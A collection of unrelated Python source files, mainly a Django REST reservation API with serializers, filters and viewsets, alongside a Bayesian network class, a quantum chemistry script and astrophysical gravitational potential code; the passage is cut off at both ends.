self.add_prior(cpt)
def add_cpt(self, cpt):
"""
Add a conditional probability table. This in turn adds an edge.
Parameters
cpt: ConditionalProbabilityTable
"""
self.add_edge(cpt)
def add_node(self, cpt):
"""
Add a conditional probability table. This adds a node.
Parameters:
cpt: ConditionalProbabilityTable
"""
outcomes = cpt.get_outcomes()
if cpt.get_givens():
raise ValueError(
"There should not be any givens for the CPT when adding a"
+ " node."
)
if len(outcomes) != 1:
raise ValueError(
"There should only be one outcome for a CPT of a "
+ "Bayesian Network."
)
for outcome in outcomes:
self.cpts[outcome] = cpt
self.graphviz_dag.node(outcome)
super().add_node(outcome)
def add_edge(self, cpt):
"""
Add a conditional probability table. This in turn adds an edge.
Parameters:
cpt: ConditionalProbabilityTable
"""
outcomes = cpt.get_outcomes()
givens = cpt.get_givens()
if len(outcomes) != 1:
raise ValueError(
"There should only be one outcome for a CPT of a "
+ "Bayesian Network."
)
for outcome in outcomes:
self.cpts[outcome] = cpt
for given in givens:
self.graphviz_dag.edge(given, outcome)
super().add_edge(start=given, end=outcome)
def find_cpt_for_node(self, node):
"""
Find conditional probability table for node.
Parameters:
node: str
Returns: ConditionalProbabilityTable
"""
return self.cpts[node]
def to_markov_network(self):
"""
Returns: MarkovNetwork
"""
markov_network = MarkovNetwork()
for _, cpt in self.cpts.items():
factor = Factor(cpt=cpt)
markov_network.add_factor(factor)
return markov_network
|
py | 1a37d1cd4efd531b87c5872fdb0388fe341612a4 | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'open_analyse.settings.develop')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
py | 1a37d3524e32c02fb768d0777ef86fb439cd2b66 | from sirius_sdk.agent.consensus.simple.messages import InitRequestLedgerMessage, InitResponseLedgerMessage, MicroLedgerState, \
ProposeTransactionsMessage, PreCommitTransactionsMessage, CommitTransactionsMessage, PostCommitTransactionsMessage
from sirius_sdk.agent.consensus.simple.state_machines import MicroLedgerSimpleConsensus
__all__ = [
'MicroLedgerSimpleConsensus', 'InitRequestLedgerMessage',
'InitResponseLedgerMessage', 'MicroLedgerState',
'ProposeTransactionsMessage', 'PreCommitTransactionsMessage',
'CommitTransactionsMessage', 'PostCommitTransactionsMessage'
]
|
py | 1a37d40e7c1c94c40e5bb7caf4371a26998c7b06 | import operator
import uuid
from functools import reduce
import arrow
import django_filters
from arrow.parser import ParserError
from django.conf import settings
from guardian.core import ObjectPermissionChecker
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import (
PermissionDenied, ValidationError as DjangoValidationError
)
from django.db.models import Q
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import viewsets, serializers, filters, exceptions, permissions
from rest_framework.authentication import TokenAuthentication, SessionAuthentication
from rest_framework.fields import BooleanField, IntegerField
from rest_framework import renderers
from rest_framework.exceptions import NotAcceptable, ValidationError
from rest_framework.settings import api_settings as drf_settings
from munigeo import api as munigeo_api
from resources.models import (
Reservation, Resource, ReservationMetadataSet, ReservationCancelReasonCategory, ReservationCancelReason)
from resources.models.reservation import RESERVATION_EXTRA_FIELDS
from resources.pagination import ReservationPagination
from resources.models.utils import generate_reservation_xlsx, get_object_or_none
from ..auth import is_general_admin
from .base import (
NullableDateTimeField, TranslatedModelSerializer, register_view, DRFFilterBooleanWidget,
ExtraDataMixin
)
from respa.renderers import ResourcesBrowsableAPIRenderer
User = get_user_model()
# FIXME: Make this configurable?
USER_ID_ATTRIBUTE = 'id'
try:
User._meta.get_field('uuid')
USER_ID_ATTRIBUTE = 'uuid'
except Exception:
pass
class UserSerializer(TranslatedModelSerializer):
display_name = serializers.ReadOnlyField(source='get_display_name')
email = serializers.ReadOnlyField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if USER_ID_ATTRIBUTE == 'id':
# id field is read_only by default, that needs to be changed
# so that the field will be validated
self.fields['id'] = IntegerField(label='ID')
else:
# if the user id attribute isn't id, modify the id field to point to the right attribute.
# the field needs to be of the right type so that validation works correctly
model_field_type = type(get_user_model()._meta.get_field(USER_ID_ATTRIBUTE))
serializer_field = self.serializer_field_mapping[model_field_type]
self.fields['id'] = serializer_field(source=USER_ID_ATTRIBUTE, label='ID')
class Meta:
model = get_user_model()
fields = ('id', 'display_name', 'email')
class ReservationCancelReasonCategorySerializer(TranslatedModelSerializer):
class Meta:
model = ReservationCancelReasonCategory
fields = [
'id', 'reservation_type', 'name', 'description'
]
class ReservationCancelReasonSerializer(serializers.ModelSerializer):
category = ReservationCancelReasonCategorySerializer(read_only=True)
category_id = serializers.PrimaryKeyRelatedField(write_only=True,
source='category',
queryset=ReservationCancelReasonCategory.objects.all())
class Meta:
model = ReservationCancelReason
fields = [
'category', 'description', 'reservation', 'category_id'
]
class ReservationSerializer(ExtraDataMixin, TranslatedModelSerializer, munigeo_api.GeoModelSerializer):
begin = NullableDateTimeField()
end = NullableDateTimeField()
user = UserSerializer(required=False)
is_own = serializers.SerializerMethodField()
state = serializers.ChoiceField(choices=Reservation.STATE_CHOICES, required=False)
need_manual_confirmation = serializers.ReadOnlyField()
user_permissions = serializers.SerializerMethodField()
cancel_reason = ReservationCancelReasonSerializer(required=False)
patchable_fields = ['state', 'cancel_reason']
class Meta:
model = Reservation
fields = [
'url', 'id', 'resource', 'user', 'begin', 'end', 'comments', 'is_own', 'state', 'need_manual_confirmation',
'staff_event', 'access_code', 'user_permissions', 'type', 'cancel_reason'
] + list(RESERVATION_EXTRA_FIELDS)
read_only_fields = list(RESERVATION_EXTRA_FIELDS)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
data = self.get_initial()
resource = None
# try to find out the related resource using initial data if that is given
resource_id = data.get('resource') if data else None
if resource_id:
resource = get_object_or_none(Resource, id=resource_id)
# if that didn't work out use the reservation's old resource if such exists
if not resource:
if isinstance(self.instance, Reservation) and isinstance(self.instance.resource, Resource):
resource = self.instance.resource
# set supported and required extra fields
if resource:
cache = self.context.get('reservation_metadata_set_cache')
supported = resource.get_supported_reservation_extra_field_names(cache=cache)
required = resource.get_required_reservation_extra_field_names(cache=cache)
# staff events have less requirements
request_user = self.context['request'].user
is_staff_event = data.get('staff_event', False)
if is_staff_event and resource.can_create_staff_event(request_user):
required = {'reserver_name', 'event_description'}
# we don't need to remove a field here if it isn't supported, as it will be read-only and will be more
# easily removed in to_representation()
for field_name in supported:
self.fields[field_name].read_only = False
for field_name in required:
self.fields[field_name].required = True
self.context.update({'resource': resource})
def get_extra_fields(self, includes, context):
from .resource import ResourceInlineSerializer
""" Define extra fields that can be included via query parameters. Method from ExtraDataMixin."""
extra_fields = {}
if 'resource_detail' in includes:
extra_fields['resource'] = ResourceInlineSerializer(read_only=True, context=context)
return extra_fields
def validate_state(self, value):
instance = self.instance
request_user = self.context['request'].user
# new reservations will get their value regardless of this value
if not instance:
return value
# state not changed
if instance.state == value:
return value
if instance.resource.can_approve_reservations(request_user):
allowed_states = (Reservation.REQUESTED, Reservation.CONFIRMED, Reservation.DENIED)
if instance.state in allowed_states and value in allowed_states:
return value
if instance.can_modify(request_user) and value == Reservation.CANCELLED:
return value
raise ValidationError(_('Illegal state change'))
def validate(self, data):
reservation = self.instance
request_user = self.context['request'].user
# this check is probably only needed for PATCH
try:
resource = data['resource']
except KeyError:
resource = reservation.resource
if not resource.can_make_reservations(request_user):
raise PermissionDenied(_('You are not allowed to make reservations in this resource.'))
if 'end' in data and data['end'] < timezone.now():
raise ValidationError(_('You cannot make a reservation in the past'))
if not resource.can_ignore_opening_hours(request_user):
reservable_before = resource.get_reservable_before()
if reservable_before and data['begin'] >= reservable_before:
raise ValidationError(_('The resource is reservable only before %(datetime)s' %
{'datetime': reservable_before}))
reservable_after = resource.get_reservable_after()
if reservable_after and data['begin'] < reservable_after:
raise ValidationError(_('The resource is reservable only after %(datetime)s' %
{'datetime': reservable_after}))
# normal users cannot make reservations for other people
if not resource.can_create_reservations_for_other_users(request_user):
data.pop('user', None)
# Check user specific reservation restrictions relating to given period.
resource.validate_reservation_period(reservation, request_user, data=data)
if data.get('staff_event', False):
if not resource.can_create_staff_event(request_user):
raise ValidationError(dict(staff_event=_('Only allowed to be set by resource managers')))
if 'type' in data:
if (data['type'] != Reservation.TYPE_NORMAL and
not resource.can_create_special_type_reservation(request_user)):
raise ValidationError({'type': _('You are not allowed to make a reservation of this type')})
if 'comments' in data:
if not resource.can_comment_reservations(request_user):
raise ValidationError(dict(comments=_('Only allowed to be set by staff members')))
if 'access_code' in data:
if data['access_code'] is None:
data['access_code'] = ''
access_code_enabled = resource.is_access_code_enabled()
if not access_code_enabled and data['access_code']:
raise ValidationError(dict(access_code=_('This field cannot have a value with this resource')))
if access_code_enabled and reservation and data['access_code'] != reservation.access_code:
raise ValidationError(dict(access_code=_('This field cannot be changed')))
# Mark begin of a critical section. Subsequent calls with this same resource will block here until the first
# request is finished. This is needed so that the validations and possible reservation saving are
# executed in one block and concurrent requests cannot be validated incorrectly.
Resource.objects.select_for_update().get(pk=resource.pk)
# Check maximum number of active reservations per user per resource.
# Only new reservations are taken into account ie. a normal user can modify an existing reservation
# even if it exceeds the limit. (one that was created via admin ui for example).
if reservation is None:
resource.validate_max_reservations_per_user(request_user)
if self.context['request'] and self.context['request'].method == 'PATCH':
for key, val in data.items():
if key not in self.patchable_fields:
raise ValidationError(_('Patching of field %(field)s is not allowed' % {'field': key}))
else:
# Run model clean
instance = Reservation(**data)
try:
instance.clean(original_reservation=reservation, user=request_user)
except DjangoValidationError as exc:
# Convert Django ValidationError to DRF ValidationError so that in the response
# field specific error messages are added in the field instead of in non_field_messages.
if not hasattr(exc, 'error_dict'):
raise ValidationError(exc)
error_dict = {}
for key, value in exc.error_dict.items():
error_dict[key] = [error.message for error in value]
raise ValidationError(error_dict)
return data
def to_internal_value(self, data):
user_data = data.copy().pop('user', None) # handle user manually
deserialized_data = super().to_internal_value(data)
# validate user and convert it to User object
if user_data:
UserSerializer(data=user_data).is_valid(raise_exception=True)
try:
deserialized_data['user'] = User.objects.get(**{USER_ID_ATTRIBUTE: user_data['id']})
except User.DoesNotExist:
raise ValidationError({
'user': {
'id': [_('Invalid pk "{pk_value}" - object does not exist.').format(pk_value=user_data['id'])]
}
})
return deserialized_data
def to_representation(self, instance):
data = super(ReservationSerializer, self).to_representation(instance)
resource = instance.resource
prefetched_user = self.context.get('prefetched_user', None)
user = prefetched_user or self.context['request'].user
if self.context['request'].accepted_renderer.format == 'xlsx':
# Return somewhat different data in case we are dealing with xlsx.
# The excel renderer needs datetime objects, so begin and end are passed as objects
# to avoid needing to convert them back and forth.
data.update(**{
'unit': resource.unit.name, # additional
'resource': resource.name, # resource name instead of id
'begin': instance.begin, # datetime object
'end': instance.end, # datetime object
'user': instance.user.email if instance.user else '', # just email
'created_at': instance.created_at
})
if not resource.can_access_reservation_comments(user):
del data['comments']
if not resource.can_view_reservation_user(user):
del data['user']
if instance.are_extra_fields_visible(user):
cache = self.context.get('reservation_metadata_set_cache')
supported_fields = set(resource.get_supported_reservation_extra_field_names(cache=cache))
else:
del data['cancel_reason']
supported_fields = set()
for field_name in RESERVATION_EXTRA_FIELDS:
if field_name not in supported_fields:
data.pop(field_name, None)
if not (resource.is_access_code_enabled() and instance.can_view_access_code(user)):
data.pop('access_code')
if 'access_code' in data and data['access_code'] == '':
data['access_code'] = None
if instance.can_view_catering_orders(user):
data['has_catering_order'] = instance.catering_orders.exists()
return data
def update(self, instance, validated_data):
request = self.context['request']
cancel_reason = validated_data.pop('cancel_reason', None)
new_state = validated_data.pop('state', instance.state)
validated_data['modified_by'] = request.user
reservation = super().update(instance, validated_data)
if new_state in [Reservation.DENIED, Reservation.CANCELLED] and cancel_reason:
if hasattr(instance, 'cancel_reason'):
instance.cancel_reason.delete()
cancel_reason['reservation'] = reservation
reservation.cancel_reason = ReservationCancelReason(**cancel_reason)
reservation.cancel_reason.save()
reservation.set_state(new_state, request.user)
return reservation
def get_is_own(self, obj):
return obj.user == self.context['request'].user
def get_user_permissions(self, obj):
request = self.context.get('request')
prefetched_user = self.context.get('prefetched_user', None)
user = prefetched_user or request.user
can_modify_and_delete = obj.can_modify(user) if request else False
return {
'can_modify': can_modify_and_delete,
'can_delete': can_modify_and_delete,
}
class UserFilterBackend(filters.BaseFilterBackend):
"""
Filter by user uuid and by is_own.
"""
def filter_queryset(self, request, queryset, view):
user = request.query_params.get('user', None)
if user:
try:
user_uuid = uuid.UUID(user)
except ValueError:
raise exceptions.ParseError(_('Invalid value in filter %(filter)s') % {'filter': 'user'})
queryset = queryset.filter(user__uuid=user_uuid)
if not request.user.is_authenticated:
return queryset
is_own = request.query_params.get('is_own', None)
if is_own is not None:
is_own = is_own.lower()
if is_own in ('true', 't', 'yes', 'y', '1'):
queryset = queryset.filter(user=request.user)
elif is_own in ('false', 'f', 'no', 'n', '0'):
queryset = queryset.exclude(user=request.user)
else:
raise exceptions.ParseError(_('Invalid value in filter %(filter)s') % {'filter': 'is_own'})
return queryset
class ExcludePastFilterBackend(filters.BaseFilterBackend):
"""
Exclude reservations in the past.
"""
def filter_queryset(self, request, queryset, view):
past = request.query_params.get('all', 'false')
past = BooleanField().to_internal_value(past)
if not past:
now = timezone.now()
return queryset.filter(end__gte=now)
return queryset
class ReservationFilterBackend(filters.BaseFilterBackend):
"""
Filter reservations by time.
"""
def filter_queryset(self, request, queryset, view):
params = request.query_params
times = {}
past = False
for name in ('start', 'end'):
if name not in params:
continue
# whenever date filtering is in use, include past reservations
past = True
try:
times[name] = arrow.get(params[name]).to('utc').datetime
except ParserError:
raise exceptions.ParseError("'%s' must be a timestamp in ISO 8601 format" % name)
is_detail_request = 'pk' in request.parser_context['kwargs']
if not past and not is_detail_request:
past = params.get('all', 'false')
past = BooleanField().to_internal_value(past)
if not past:
now = timezone.now()
queryset = queryset.filter(end__gte=now)
if times.get('start', None):
queryset = queryset.filter(end__gte=times['start'])
if times.get('end', None):
queryset = queryset.filter(begin__lte=times['end'])
return queryset
class NeedManualConfirmationFilterBackend(filters.BaseFilterBackend):
def filter_queryset(self, request, queryset, view):
filter_value = request.query_params.get('need_manual_confirmation', None)
if filter_value is not None:
need_manual_confirmation = BooleanField().to_internal_value(filter_value)
return queryset.filter(resource__need_manual_confirmation=need_manual_confirmation)
return queryset
class StateFilterBackend(filters.BaseFilterBackend):
def filter_queryset(self, request, queryset, view):
state = request.query_params.get('state', None)
if state:
queryset = queryset.filter(state__in=state.replace(' ', '').split(','))
return queryset
class CanApproveFilterBackend(filters.BaseFilterBackend):
def filter_queryset(self, request, queryset, view):
filter_value = request.query_params.get('can_approve', None)
if filter_value:
queryset = queryset.filter(resource__need_manual_confirmation=True)
allowed_resources = Resource.objects.with_perm('can_approve_reservation', request.user)
can_approve = BooleanField().to_internal_value(filter_value)
if can_approve:
queryset = queryset.filter(resource__in=allowed_resources)
else:
queryset = queryset.exclude(resource__in=allowed_resources)
return queryset
class ReservationFilterSet(django_filters.rest_framework.FilterSet):
class Meta:
model = Reservation
fields = ('event_subject', 'host_name', 'reserver_name', 'resource_name', 'is_favorite_resource', 'unit')
@property
def qs(self):
qs = super().qs
user = self.request.user
query_params = set(self.request.query_params)
# if any of the extra field related filters are used, restrict results to reservations
# the user has right to see
if bool(query_params & set(RESERVATION_EXTRA_FIELDS)):
qs = qs.extra_fields_visible(user)
if 'has_catering_order' in query_params:
qs = qs.catering_orders_visible(user)
return qs
event_subject = django_filters.CharFilter(lookup_expr='icontains')
host_name = django_filters.CharFilter(lookup_expr='icontains')
reserver_name = django_filters.CharFilter(lookup_expr='icontains')
resource_name = django_filters.CharFilter(field_name='resource', lookup_expr='name__icontains')
is_favorite_resource = django_filters.BooleanFilter(method='filter_is_favorite_resource',
widget=DRFFilterBooleanWidget)
resource_group = django_filters.Filter(field_name='resource__groups__identifier', lookup_expr='in',
widget=django_filters.widgets.CSVWidget, distinct=True)
unit = django_filters.CharFilter(field_name='resource__unit_id')
has_catering_order = django_filters.BooleanFilter(method='filter_has_catering_order', widget=DRFFilterBooleanWidget)
resource = django_filters.Filter(lookup_expr='in', widget=django_filters.widgets.CSVWidget)
reserver_info_search = django_filters.CharFilter(method="filter_reserver_info_search")
def filter_is_favorite_resource(self, queryset, name, value):
user = self.request.user
if not user.is_authenticated:
return queryset.none() if value else queryset
filtering = {'resource__favorited_by': user}
return queryset.filter(**filtering) if value else queryset.exclude(**filtering)
def filter_has_catering_order(self, queryset, name, value):
return queryset.exclude(catering_orders__isnull=value)
def filter_reserver_info_search(self, queryset, name, value):
"""
A partial copy of rest_framework.filters.SearchFilter.filter_queryset.
Needed due to custom filters applied to queryset within this ReservationFilterSet.
Does not support comma separation of values, i.e. '?reserver_info_search=foo,bar' will
be considered as one string - 'foo,bar'.
"""
if not value:
return queryset
fields = ('user__first_name', 'user__last_name', 'user__email')
conditions = []
for field in fields:
conditions.append(Q(**{field + '__icontains': value}))
# assume that first_name and last_name were provided if empty space was found
if ' ' in value and value.count(' ') == 1:
name1, name2 = value.split()
filters = Q(
user__first_name__icontains=name1,
user__last_name__icontains=name2,
) | Q(
user__first_name__icontains=name2,
user__last_name__icontains=name1,
)
conditions.append(filters)
return queryset.filter(reduce(operator.or_, conditions))
class ReservationPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.can_modify(request.user)
class ReservationExcelRenderer(renderers.BaseRenderer):
media_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
format = 'xlsx'
charset = None
render_style = 'binary'
def render(self, data, media_type=None, renderer_context=None):
if not renderer_context or renderer_context['response'].status_code == 404:
return bytes()
if renderer_context['view'].action == 'retrieve':
return generate_reservation_xlsx([data])
elif renderer_context['view'].action == 'list':
return generate_reservation_xlsx(data['results'])
else:
return NotAcceptable()
class ReservationCacheMixin:
def _preload_permissions(self):
units = set()
resource_groups = set()
resources = set()
checker = ObjectPermissionChecker(self.request.user)
for rv in self._page:
resources.add(rv.resource)
rv.resource._permission_checker = checker
for res in resources:
units.add(res.unit)
for g in res.groups.all():
resource_groups.add(g)
if units:
checker.prefetch_perms(units)
if resource_groups:
checker.prefetch_perms(resource_groups)
def _get_cache_context(self):
context = {}
set_list = ReservationMetadataSet.objects.all().prefetch_related('supported_fields', 'required_fields')
context['reservation_metadata_set_cache'] = {x.id: x for x in set_list}
self._preload_permissions()
return context
class ReservationViewSet(munigeo_api.GeoModelAPIView, viewsets.ModelViewSet, ReservationCacheMixin):
queryset = Reservation.objects.select_related('user', 'resource', 'resource__unit')\
.prefetch_related('catering_orders').prefetch_related('resource__groups').order_by('begin', 'resource__unit__name', 'resource__name')
if settings.RESPA_PAYMENTS_ENABLED:
queryset = queryset.prefetch_related('order', 'order__order_lines', 'order__order_lines__product')
filter_backends = (DjangoFilterBackend, filters.OrderingFilter, UserFilterBackend, ReservationFilterBackend,
NeedManualConfirmationFilterBackend, StateFilterBackend, CanApproveFilterBackend)
filterset_class = ReservationFilterSet
permission_classes = (permissions.IsAuthenticatedOrReadOnly, ReservationPermission)
renderer_classes = (renderers.JSONRenderer, ResourcesBrowsableAPIRenderer, ReservationExcelRenderer)
pagination_class = ReservationPagination
authentication_classes = (
list(drf_settings.DEFAULT_AUTHENTICATION_CLASSES) +
[TokenAuthentication, SessionAuthentication])
ordering_fields = ('begin',)
def get_serializer_class(self):
if settings.RESPA_PAYMENTS_ENABLED:
from payments.api.reservation import PaymentsReservationSerializer # noqa
return PaymentsReservationSerializer
else:
return ReservationSerializer
def get_serializer(self, *args, **kwargs):
if 'data' not in kwargs and len(args) == 1:
# It's a read operation
instance_or_page = args[0]
if isinstance(instance_or_page, Reservation):
self._page = [instance_or_page]
else:
self._page = instance_or_page
return super().get_serializer(*args, **kwargs)
def get_serializer_context(self, *args, **kwargs):
context = super().get_serializer_context(*args, **kwargs)
if hasattr(self, '_page'):
context.update(self._get_cache_context())
request_user = self.request.user
if request_user.is_authenticated:
prefetched_user = get_user_model().objects.prefetch_related('unit_authorizations', 'unit_group_authorizations__subject__members').\
get(pk=request_user.pk)
context['prefetched_user'] = prefetched_user
return context
def get_queryset(self):
queryset = super().get_queryset()
user = self.request.user
# General Administrators can see all reservations
if is_general_admin(user):
return queryset
# normal users can see only their own reservations and reservations that are confirmed, requested or
# waiting for payment
filters = Q(state__in=(Reservation.CONFIRMED, Reservation.REQUESTED, Reservation.WAITING_FOR_PAYMENT))
if user.is_authenticated:
filters |= Q(user=user)
queryset = queryset.filter(filters)
queryset = queryset.filter(resource__in=Resource.objects.visible_for(user))
return queryset
def perform_create(self, serializer):
override_data = {'created_by': self.request.user, 'modified_by': self.request.user}
if 'user' not in serializer.validated_data:
override_data['user'] = self.request.user
override_data['state'] = Reservation.CREATED
instance = serializer.save(**override_data)
resource = serializer.validated_data['resource']
if resource.need_manual_confirmation and not resource.can_bypass_manual_confirmation(self.request.user):
new_state = Reservation.REQUESTED
else:
if instance.get_order():
new_state = Reservation.WAITING_FOR_PAYMENT
else:
new_state = Reservation.CONFIRMED
instance.set_state(new_state, self.request.user)
def perform_destroy(self, instance):
instance.set_state(Reservation.CANCELLED, self.request.user)
def list(self, request, *args, **kwargs):
response = super().list(request, *args, **kwargs)
if request.accepted_renderer.format == 'xlsx':
response['Content-Disposition'] = 'attachment; filename={}.xlsx'.format(_('reservations'))
return response
def retrieve(self, request, *args, **kwargs):
response = super().retrieve(request, *args, **kwargs)
if request.accepted_renderer.format == 'xlsx':
response['Content-Disposition'] = 'attachment; filename={}-{}.xlsx'.format(_('reservation'), kwargs['pk'])
return response
class ReservationCancelReasonCategoryViewSet(viewsets.ReadOnlyModelViewSet):
queryset = ReservationCancelReasonCategory.objects.all()
filter_backends = (DjangoFilterBackend,)
serializer_class = ReservationCancelReasonCategorySerializer
filterset_fields = ['reservation_type']
pagination_class = None
register_view(ReservationViewSet, 'reservation')
register_view(ReservationCancelReasonCategoryViewSet, 'cancel_reason_category')
|
py | 1a37d46c672aa4ed432dc56559729a79d5ceddce | #!/usr/bin/env python
from pyscf import gto, scf, dft
from pyscf.prop import hfc
mol = gto.M(atom='''
C 0 0 0
N 0 0 1.1747
''',
basis='ccpvdz', spin=1, charge=0, verbose=3)
mf = scf.UHF(mol).run()
gobj = hfc.uhf.HFC(mf).set(verbose=4)
gobj.sso = True
gobj.soo = True
gobj.so_eff_charge = False
gobj.kernel()
|
py | 1a37d4c1bc00f0acecf7e955c7319b3582584f75 | # Generated by Django 2.0.2 on 2018-04-17 16:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20180417_1911'),
]
operations = [
migrations.RenameModel(
old_name='CategoryModel',
new_name='TagModel',
),
migrations.RenameField(
model_name='postmodel',
old_name='category',
new_name='tags',
),
]
|
py | 1a37d53201068d45434ab0dd0c569955582e515c | from orbit_fits import *
def ref_frame():
"""Print properties of the reference frame"""
print(gc_frame)
def potentials():
"""Print properties of the gravitational potentials used"""
pot = [ham, ham_bovy, ham_heavy]
name = ['fiducial', 'bovy', 'heavy']
#pos = np.array([[0, 0, 25], [0,0,200]]).T * u.kpc
pos = np.array([[25, 0, 0], [200,0,0]]).T * u.kpc
mass = np.zeros((3,2)) * u.Msun
for e, p in enumerate(pot):
print(name[e])
# potential parameters
keys = p.potential.parameters.keys()
for k in keys:
print(k, p.potential.parameters[k])
# enclosed mass
mass[e] = p.potential.mass_enclosed(pos)
print(mass[e])
print(mass[0])
print(mass[1]/mass[0])
print(mass[2]/mass[0])
def plot_enclosed_mass():
"""Plot the ratio of enclosed mass for the adopted potentials"""
pot = [ham, ham_bovy, ham_heavy]
name = ['Fiducial', 'MWPotential2014', 'Price-Whelan & Bonaca (2018)']
colors = ['k', 'tab:blue', 'tab:red']
pos = np.zeros((3,100)) * u.kpc
pos[0] = np.logspace(np.log10(20./100.), np.log10(20*10.), pos.shape[1]) * u.kpc
mass = np.zeros((3,100))
for e, p in enumerate(pot):
mass[e] = p.potential.mass_enclosed(pos)
plt.close()
plt.figure(figsize=(8,6))
for i in range(3):
plt.plot(pos[0], mass[i]/mass[0], '-', color=colors[i], label=name[i])
plt.axvline(25, color='k', ls=':')
plt.legend(fontsize='small', loc=0)
plt.ylim(0.7, 1.3)
plt.xlim(0,200)
plt.xlabel('r [kpc]')
plt.ylabel('M(<r) / M$_{fid}$(<r)')
plt.tight_layout()
plt.savefig('../plots/response/enclosed_mass_potentials.png')
|
py | 1a37d6a939837438c460616078dc3ea93b5060c6 | ###############################################################################
# TwoPowerTriaxialPotential.py: General class for triaxial potentials
# derived from densities with two power-laws
#
# amp/[4pia^3]
# rho(r)= ------------------------------------
# (m/a)^\alpha (1+m/a)^(\beta-\alpha)
#
# with
#
# m^2 = x^2 + y^2/b^2 + z^2/c^2
###############################################################################
import numpy
from scipy import special
from .Potential import _APY_LOADED
from .EllipsoidalPotential import EllipsoidalPotential
if _APY_LOADED:
from astropy import units
class TwoPowerTriaxialPotential(EllipsoidalPotential):
"""Class that implements triaxial potentials that are derived from
two-power density models
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)^\\alpha\\,(1+m/a)^{\\beta-\\alpha}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
Note that this general class of potentials does *not* automatically revert to the special TriaxialNFWPotential, TriaxialHernquistPotential, or TriaxialJaffePotential when using their (alpha,beta) values (like TwoPowerSphericalPotential).
"""
def __init__(self,amp=1.,a=5.,alpha=1.5,beta=3.5,b=1.,c=1.,
zvec=None,pa=None,glorder=50,
normalize=False,ro=None,vo=None):
"""
NAME:
__init__
PURPOSE:
initialize a triaxial two-power-density potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
alpha - inner power (0 <= alpha < 3)
beta - outer power ( beta > 2)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis (rad or Quantity)
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2016-05-30 - Started - Bovy (UofT)
2018-08-07 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
self.a= a
self._scale= self.a
if beta <= 2. or alpha < 0. or alpha >= 3.:
raise IOError('TwoPowerTriaxialPotential requires 0 <= alpha < 3 and beta > 2')
self.alpha= alpha
self.beta= beta
self.betaminusalpha= self.beta-self.alpha
self.twominusalpha= 2.-self.alpha
self.threeminusalpha= 3.-self.alpha
if self.twominusalpha != 0.:
self.psi_inf= special.gamma(self.beta-2.)\
*special.gamma(3.-self.alpha)\
/special.gamma(self.betaminusalpha)
# Adjust amp
self._amp/= (4.*numpy.pi*self.a**3)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
if self.twominusalpha == 0.:
return -2.*self.a**2*(self.a/m)**self.betaminusalpha\
/self.betaminusalpha\
*special.hyp2f1(self.betaminusalpha,
self.betaminusalpha,
self.betaminusalpha+1,
-self.a/m)
else:
return -2.*self.a**2\
*(self.psi_inf-(m/self.a)**self.twominusalpha\
/self.twominusalpha\
*special.hyp2f1(self.twominusalpha,
self.betaminusalpha,
self.threeminusalpha,
-m/self.a))
def _mdens(self,m):
"""Density as a function of m"""
return (self.a/m)**self.alpha/(1.+m/self.a)**(self.betaminusalpha)
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -self._mdens(m)*(self.a*self.alpha+self.beta*m)/m/(self.a+m)
class TriaxialHernquistPotential(EllipsoidalPotential):
"""Class that implements the triaxial Hernquist potential
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)\\,(1+m/a)^{3}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
"""
def __init__(self,amp=1.,a=2.,normalize=False,b=1.,c=1.,zvec=None,pa=None,
glorder=50,ro=None,vo=None):
"""
NAME:
__init__
PURPOSE:
Initialize a triaxial Hernquist potential
INPUT:
